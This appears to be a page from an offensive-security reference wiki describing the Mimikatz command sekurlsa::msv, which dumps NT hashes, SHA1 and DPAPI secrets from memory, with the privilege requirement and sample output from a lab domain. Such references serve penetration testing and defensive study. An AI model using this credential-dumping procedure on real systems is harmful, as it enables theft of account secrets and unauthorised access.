msv
sekurlsa::msv dumps and lists the NT hash (and other secrets) by targeting the MSV1_0 Authentication Package.
LM and NT hashes are used to authenticate accounts using the NTLM protocol. These hashes are often called NTLM hash and many documentations, resources, blogpost and tools mix terms. In this case, "ntlm" refers to the NT hash.
This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).
1
mimikatz # sekurlsa::msv
2
โ€‹
3
Authentication Id : 0 ; 712960 (00000000:000ae100)
4
Session : Service from 0
5
User Name : MediaAdmin$
6
Domain : hacklab
7
Logon Server : DC
8
Logon Time : 9/26/2021 4:57:38 AM
9
SID : S-1-5-21-2725560159-1428537199-2260736313-1427
10
msv :
11
[00000003] Primary
12
* Username : MediaAdmin$
13
* Domain : hacklab
14
* NTLM : 35950fdc8d3d99b4136510414009662d
15
* SHA1 : 185535108abf1fc0287dedbaff210b77989251c8
16
* DPAPI : 73006d59c6adcf27da6e097787a6d1f9
Copied!
Last modified 6mo ago
Copy link